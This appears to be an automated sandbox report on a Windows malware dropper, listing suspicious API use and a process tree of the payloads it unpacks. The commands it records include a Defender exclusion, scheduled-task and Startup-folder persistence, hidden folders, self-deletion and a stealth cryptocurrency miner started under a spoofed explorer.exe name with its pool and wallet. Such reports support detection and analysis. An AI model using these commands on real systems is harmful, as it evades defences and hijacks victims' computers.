Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4320	Sun150faeb3537d.exe
Token: SeAssignPrimaryTokenPrivilege	4320	Sun150faeb3537d.exe
Token: SeLockMemoryPrivilege	4320	Sun150faeb3537d.exe
Token: SeIncreaseQuotaPrivilege	4320	Sun150faeb3537d.exe
Token: SeMachineAccountPrivilege	4320	Sun150faeb3537d.exe
Token: SeTcbPrivilege	4320	Sun150faeb3537d.exe
Token: SeSecurityPrivilege	4320	Sun150faeb3537d.exe
Token: SeTakeOwnershipPrivilege	4320	Sun150faeb3537d.exe
Token: SeLoadDriverPrivilege	4320	Sun150faeb3537d.exe
Token: SeSystemProfilePrivilege	4320	Sun150faeb3537d.exe
Token: SeSystemtimePrivilege	4320	Sun150faeb3537d.exe
Token: SeProfSingleProcessPrivilege	4320	Sun150faeb3537d.exe
Token: SeIncBasePriorityPrivilege	4320	Sun150faeb3537d.exe
Token: SeCreatePagefilePrivilege	4320	Sun150faeb3537d.exe
Token: SeCreatePermanentPrivilege	4320	Sun150faeb3537d.exe
Token: SeBackupPrivilege	4320	Sun150faeb3537d.exe
Token: SeRestorePrivilege	4320	Sun150faeb3537d.exe
Token: SeShutdownPrivilege	4320	Sun150faeb3537d.exe
Token: SeDebugPrivilege	4320	Sun150faeb3537d.exe
Token: SeAuditPrivilege	4320	Sun150faeb3537d.exe
Token: SeSystemEnvironmentPrivilege	4320	Sun150faeb3537d.exe
Token: SeChangeNotifyPrivilege	4320	Sun150faeb3537d.exe
Token: SeRemoteShutdownPrivilege	4320	Sun150faeb3537d.exe
Token: SeUndockPrivilege	4320	Sun150faeb3537d.exe
Token: SeSyncAgentPrivilege	4320	Sun150faeb3537d.exe
Token: SeEnableDelegationPrivilege	4320	Sun150faeb3537d.exe
Token: SeManageVolumePrivilege	4320	Sun150faeb3537d.exe
Token: SeImpersonatePrivilege	4320	Sun150faeb3537d.exe
Token: SeCreateGlobalPrivilege	4320	Sun150faeb3537d.exe
Token: 31	4320	Sun150faeb3537d.exe
Token: 32	4320	Sun150faeb3537d.exe
Token: 33	4320	Sun150faeb3537d.exe
Token: 34	4320	Sun150faeb3537d.exe
Token: 35	4320	Sun150faeb3537d.exe
Token: SeDebugPrivilege	4248	Sun157ff8e4440aa.exe
Token: SeDebugPrivilege	4340	Sun1584240df9fe73a3.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	4972	4479475.exe
Token: SeDebugPrivilege	3000	2.exe
Token: SeDebugPrivilege	4484	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4664	1723234.exe
Token: SeRestorePrivilege	1776	WerFault.exe
Token: SeBackupPrivilege	1776	WerFault.exe
Token: SeBackupPrivilege	1776	WerFault.exe
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeDebugPrivilege	1776	WerFault.exe
Token: SeDebugPrivilege	2880	WerFault.exe
Token: SeDebugPrivilege	2752	8.exe
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
2252	Explorer.EXE
2236	setup_2.tmp
4524	ultramediaburner.tmp
6184	installer.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2252	Explorer.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
2252	Explorer.EXE
5548	MicrosoftEdge.exe
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
7164	cmd.exe
5832	MicrosoftEdge.exe
6464	MicrosoftEdgeCP.exe
6464	MicrosoftEdgeCP.exe
4264	MicrosoftEdge.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 704	2876	setup_x86_x64_install.exe	73
PID 2876 wrote to memory of 704	2876	setup_x86_x64_install.exe	73
PID 2876 wrote to memory of 704	2876	setup_x86_x64_install.exe	73
PID 704 wrote to memory of 1916	704	setup_installer.exe	74
PID 704 wrote to memory of 1916	704	setup_installer.exe	74
PID 704 wrote to memory of 1916	704	setup_installer.exe	74
PID 1916 wrote to memory of 3880	1916	setup_install.exe	77
PID 1916 wrote to memory of 3880	1916	setup_install.exe	77
PID 1916 wrote to memory of 3880	1916	setup_install.exe	77
PID 1916 wrote to memory of 3576	1916	setup_install.exe	78
PID 1916 wrote to memory of 3576	1916	setup_install.exe	78
PID 1916 wrote to memory of 3576	1916	setup_install.exe	78
PID 1916 wrote to memory of 2680	1916	setup_install.exe	79
PID 1916 wrote to memory of 2680	1916	setup_install.exe	79
PID 1916 wrote to memory of 2680	1916	setup_install.exe	79
PID 1916 wrote to memory of 2876	1916	setup_install.exe	97
PID 1916 wrote to memory of 2876	1916	setup_install.exe	97
PID 1916 wrote to memory of 2876	1916	setup_install.exe	97
PID 1916 wrote to memory of 4056	1916	setup_install.exe	80
PID 1916 wrote to memory of 4056	1916	setup_install.exe	80
PID 1916 wrote to memory of 4056	1916	setup_install.exe	80
PID 1916 wrote to memory of 4108	1916	setup_install.exe	96
PID 1916 wrote to memory of 4108	1916	setup_install.exe	96
PID 1916 wrote to memory of 4108	1916	setup_install.exe	96
PID 1916 wrote to memory of 4136	1916	setup_install.exe	81
PID 1916 wrote to memory of 4136	1916	setup_install.exe	81
PID 1916 wrote to memory of 4136	1916	setup_install.exe	81
PID 1916 wrote to memory of 4156	1916	setup_install.exe	82
PID 1916 wrote to memory of 4156	1916	setup_install.exe	82
PID 1916 wrote to memory of 4156	1916	setup_install.exe	82
PID 1916 wrote to memory of 4176	1916	setup_install.exe	95
PID 1916 wrote to memory of 4176	1916	setup_install.exe	95
PID 1916 wrote to memory of 4176	1916	setup_install.exe	95
PID 1916 wrote to memory of 4192	1916	setup_install.exe	94
PID 1916 wrote to memory of 4192	1916	setup_install.exe	94
PID 1916 wrote to memory of 4192	1916	setup_install.exe	94
PID 3576 wrote to memory of 4216	3576	cmd.exe	83
PID 3576 wrote to memory of 4216	3576	cmd.exe	83
PID 4136 wrote to memory of 4248	4136	cmd.exe	93
PID 4136 wrote to memory of 4248	4136	cmd.exe	93
PID 4108 wrote to memory of 4260	4108	cmd.exe	92
PID 4108 wrote to memory of 4260	4108	cmd.exe	92
PID 4108 wrote to memory of 4260	4108	cmd.exe	92
PID 2876 wrote to memory of 4272	2876	cmd.exe	84
PID 2876 wrote to memory of 4272	2876	cmd.exe	84
PID 2876 wrote to memory of 4272	2876	cmd.exe	84
PID 4056 wrote to memory of 4296	4056	cmd.exe	91
PID 4056 wrote to memory of 4296	4056	cmd.exe	91
PID 4056 wrote to memory of 4296	4056	cmd.exe	91
PID 4156 wrote to memory of 4320	4156	cmd.exe	90
PID 4156 wrote to memory of 4320	4156	cmd.exe	90
PID 4156 wrote to memory of 4320	4156	cmd.exe	90
PID 4176 wrote to memory of 4340	4176	cmd.exe	89
PID 4176 wrote to memory of 4340	4176	cmd.exe	89
PID 3880 wrote to memory of 4356	3880	cmd.exe	88
PID 3880 wrote to memory of 4356	3880	cmd.exe	88
PID 3880 wrote to memory of 4356	3880	cmd.exe	88
PID 2680 wrote to memory of 4368	2680	cmd.exe	85
PID 2680 wrote to memory of 4368	2680	cmd.exe	85
PID 2680 wrote to memory of 4368	2680	cmd.exe	85
PID 4192 wrote to memory of 4432	4192	cmd.exe	86
PID 4192 wrote to memory of 4432	4192	cmd.exe	86
PID 4192 wrote to memory of 4432	4192	cmd.exe	86
PID 4296 wrote to memory of 4584	4296	Sun15b61bf18b0f1.exe	87

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
5160	attrib.exe
6668	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2252
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1916
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3576
      - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun152260a303c33a7.exe
        
        Sun152260a303c33a7.exe
        6⤵
        Executes dropped EXE
        
        PID:4216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2680
      - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun15d8dfe2c6d17.exe
        
        Sun15d8dfe2c6d17.exe
        6⤵
        Executes dropped EXE
        
        PID:4368
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun15b61bf18b0f1.exe
        
        Sun15b61bf18b0f1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4296
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4136
      - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun157ff8e4440aa.exe
        
        Sun157ff8e4440aa.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        7⤵
        Executes dropped EXE
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        8⤵
        Executes dropped EXE
        
        PID:5104
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:1060
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:1224
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5876
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        10⤵
        
        PID:1504
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:5448
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        11⤵
        Creates scheduled task(s)
        
        PID:2728
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        10⤵
        Executes dropped EXE
        
        PID:4072
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        10⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3000 -s 1568
        9⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        Executes dropped EXE
        
        PID:4724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 808
        9⤵
        Program crash
        
        PID:3792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 840
        9⤵
        Program crash
        
        PID:4372
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 888
        9⤵
        Program crash
        
        PID:5280
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 896
        9⤵
        Program crash
        
        PID:5636
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 968
        9⤵
        Program crash
        
        PID:5888
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1096
        9⤵
        Program crash
        
        PID:6008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 936
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4484
        
        C:\ProgramData\2452635.exe
        
        "C:\ProgramData\2452635.exe"
        9⤵
        
        PID:4636
        
        C:\ProgramData\4345284.exe
        
        "C:\ProgramData\4345284.exe"
        9⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:1572
        
        C:\ProgramData\8906706.exe
        
        "C:\ProgramData\8906706.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5180
        
        C:\ProgramData\8906706.exe
        
        "C:\ProgramData\8906706.exe"
        10⤵
        
        PID:5704
        
        C:\ProgramData\8906706.exe
        
        "C:\ProgramData\8906706.exe"
        10⤵
        Executes dropped EXE
        
        PID:5712
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 956
        10⤵
        Program crash
        
        PID:5804
        
        C:\ProgramData\1559656.exe
        
        "C:\ProgramData\1559656.exe"
        9⤵
        Executes dropped EXE
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        8⤵
        Executes dropped EXE
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        
        PID:900
        
        C:\Users\Admin\AppData\Local\Temp\is-TSI00.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TSI00.tmp\setup_2.tmp" /SL5="$10204,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\is-T76O9.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-T76O9.tmp\setup_2.tmp" /SL5="$80058,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        8⤵
        Executes dropped EXE
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        9⤵
        Executes dropped EXE
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        8⤵
        Executes dropped EXE
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        Executes dropped EXE
        
        PID:5744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SoftID\xender.bat" "
        10⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Roaming\SoftID\inupda.exe
        
        inupda.exe
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5280
        
        C:\Users\Admin\AppData\Roaming\SoftID\inupda.exe
        
        inupda.exe
        12⤵
        Executes dropped EXE
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        14⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4100
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        15⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        16⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
        15⤵
        Creates scheduled task(s)
        
        PID:5288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        Executes dropped EXE
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\downloadmanager\downloadmanager.exe
        
        "C:\Users\Admin\AppData\Local\Temp\downloadmanager\downloadmanager.exe"
        15⤵
        Executes dropped EXE
        
        PID:6088
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\GUI\TVtuner\tvpd.vbs" /f=CREATE_NO_WINDOW install.cmd
        16⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\GUI\TVtuner\301le.bat" "
        17⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 7
        18⤵
        Delays execution with timeout.exe
        
        PID:6268
        
        C:\GUI\TVtuner\tvps.exe
        
        "tvps.exe" e -pVusya78gasxhgxahghxsahgV insl.rar
        18⤵
        Executes dropped EXE
        
        PID:6008
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 6
        18⤵
        Delays execution with timeout.exe
        
        PID:5132
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\GUI\TVtuner\spr.vbs"
        18⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\GUI\TVtuner\G7.bat" "
        19⤵
        
        PID:5900
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\GUI"
        20⤵
        Views/modifies file attributes
        
        PID:5160
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        20⤵
        Delays execution with timeout.exe
        
        PID:4656
        
        C:\GUI\TVtuner\civdata.exe
        
        civdata.exe /start
        20⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4548
        
        C:\GUI\TVtuner\civdata.exe
        
        civdata.exe /start
        21⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4636
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tvps.exe
        20⤵
        Kills process with taskkill
        
        PID:5448
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tvps.exe
        20⤵
        Kills process with taskkill
        
        PID:6984
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\GUI\TVtuner"
        20⤵
        Views/modifies file attributes
        
        PID:6668
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 4
        20⤵
        Delays execution with timeout.exe
        
        PID:3328
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        18⤵
        Delays execution with timeout.exe
        
        PID:4916
        
        C:\Users\Admin\AppData\Roaming\SoftID\FoxyIDM621d.exe
        
        FoxyIDM621d.exe
        11⤵
        Executes dropped EXE
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
        12⤵
        Executes dropped EXE
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        8⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4156
      - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun150faeb3537d.exe
        
        Sun150faeb3537d.exe
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:4320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:5484
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4192
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4176
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun15223697c98.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4108
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun150d896340a863.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2876
- - C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun150d896340a863.exe
    Sun150d896340a863.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:4272
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im Sun150d896340a863.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun150d896340a863.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:5676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun150d896340a863.exe /f
        5⤵
        Kills process with taskkill
        
        PID:1804
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:6176
- C:\Users\Admin\AppData\Local\Temp\253C.exe
  C:\Users\Admin\AppData\Local\Temp\253C.exe
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Users\Admin\AppData\Local\Temp\5E8D.exe
  C:\Users\Admin\AppData\Local\Temp\5E8D.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4916
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5E8D.exe"
    3⤵
    PID:2324
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:7132
- - C:\Users\Admin\AppData\Local\Temp\PxsWQbUUxe.exe
    "C:\Users\Admin\AppData\Local\Temp\PxsWQbUUxe.exe"
    3⤵
    PID:4760
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
      4⤵
      Creates scheduled task(s)
      PID:5672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2708
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
  2⤵
  PID:4068

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
PID:2608
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1908

c:\windows\system32\svchost.exe
